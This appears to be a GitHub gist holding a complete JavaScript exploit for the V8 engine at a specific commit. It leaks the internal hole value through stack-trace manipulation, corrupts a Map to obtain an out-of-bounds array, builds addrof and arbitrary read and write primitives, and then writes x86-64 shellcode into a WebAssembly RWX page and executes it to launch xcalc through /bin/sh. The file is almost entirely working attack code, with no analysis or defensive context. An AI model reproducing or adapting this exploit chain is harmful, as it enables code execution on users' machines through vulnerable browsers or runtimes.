Skip to content

Instantly share code, notes, and snippets.

@anvbis

anvbis/b5fa92428c9d4516ebdc72643ea980d8bde8f987.js

Created April 11, 2023 07:08
Show Gist options
  • Save anvbis/1de7fcab6b862014f07aa6dec4ee5fe5 to your computer and use it in GitHub Desktop.
Save anvbis/1de7fcab6b862014f07aa6dec4ee5fe5 to your computer and use it in GitHub Desktop.
Download ZIP
b5fa92428c9d4516ebdc72643ea980d8bde8f987.js
Raw
b5fa92428c9d4516ebdc72643ea980d8bde8f987.js
/*
HEAD @ b5fa92428c9d4516ebdc72643ea980d8bde8f987
*/
let buf = new ArrayBuffer(8);
let f64 = new Float64Array(buf);
let i64 = new BigUint64Array(buf);
const ftoi = x => {
f64[0] = x;
return i64[0];
};
const itof = x => {
i64[0] = x;
return f64[0];
};
const hex = x => {
return `0x${x.toString(16)}`;
};
function foo() {
const _x = a => (a => a.x())(a);
const _y = (a, b) => b.y(a, b, 1);
const _z = i => {
Error.prepareStackTrace = (_, x) => x[i].getThis();
return Error().stack;
};
function X() {}
X.prototype.x = () => {
let z = _z(3);
z[0] = 0;
e = { x: z, y: _z(3) };
};
X.prototype.y = function(a, b) {
'use strict';
_x.call(arguments, b);
return arguments[a];
}
let e = null;
let x = new X();
for (let i = 0; i < 10000; i++)
_y(1, x);
delete e.x[0];
return e.y[0];
}
function bar() {
let hole = foo();
let m = new Map();
m.set(1, 1);
m.set(hole, 1);
m.delete(hole);
m.delete(hole);
m.delete(1);
let a = new Array(1.1, 2.2);
m.set(16, -1);
m.set(a, 1337);
return a;
}
let oob = bar();
console.assert(oob.length == 1337);
/* flt.elements @ oob[7] (upper) */
/* obj.elements @ oob[16] (upper) */
/* rdw.elements @ oob[20] (upper) */
let flt = [1.1];
let obj = [{a: 1}];
let rdw = [1.1];
/* set upper bits of oob[7] to upper bits of oob[16] */
let _x = ftoi(oob[7]) & 0xffffffffn;
let _y = ftoi(oob[16]) >> 32n;
oob[7] = itof((_y << 32n) + _x);
const addrof = o => {
obj[0] = o;
return (ftoi(flt[0]) & 0xffffffffn) - 1n;
};
const read = p => {
let _x = ftoi(oob[20]) & 0xffffffffn;
oob[20] = itof(((p - 8n + 1n) << 32n) + _x);
return ftoi(rdw[0]);
};
const write = (p, x) => {
let _x = ftoi(oob[20]) & 0xffffffffn;
oob[20] = itof(((p - 8n + 1n) << 32n) + _x);
rdw[0] = itof(x);
};
let wasm = new Uint8Array([
0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x85, 0x80, 0x80, 0x80,
0x00, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x82, 0x80, 0x80, 0x80, 0x00, 0x01,
0x00, 0x04, 0x84, 0x80, 0x80, 0x80, 0x00, 0x01, 0x70, 0x00, 0x00, 0x05, 0x83,
0x80, 0x80, 0x80, 0x00, 0x01, 0x00, 0x01, 0x06, 0x81, 0x80, 0x80, 0x80, 0x00,
0x00, 0x07, 0x91, 0x80, 0x80, 0x80, 0x00, 0x02, 0x06, 0x6d, 0x65, 0x6d, 0x6f,
0x72, 0x79, 0x02, 0x00, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00, 0x0a, 0x8a,
0x80, 0x80, 0x80, 0x00, 0x01, 0x84, 0x80, 0x80, 0x80, 0x00, 0x00, 0x41, 0x2a,
0x0b
]);
let module = new WebAssembly.Module(wasm);
let instance = new WebAssembly.Instance(module);
let rwx = read(addrof(instance) + 0x60n);
/* DISPLAY=':0.0' xcalc */
let shellcode = new Uint8Array([
0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54,
0x5f, 0x52, 0x66, 0x68, 0x2d, 0x63, 0x54, 0x5e, 0x52, 0xe8, 0x15, 0x00, 0x00,
0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x27, 0x3a, 0x30, 0x2e,
0x30, 0x27, 0x20, 0x78, 0x63, 0x61, 0x6c, 0x63, 0x00, 0x56, 0x57, 0x54, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05
]);
let abuf = new ArrayBuffer(shellcode.length);
let view = new DataView(abuf);
write(addrof(abuf) + 0x1cn, rwx);
for (let i = 0; i < shellcode.length; i++) {
view.setUint8(i, shellcode[i]);
}
instance.exports.main();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment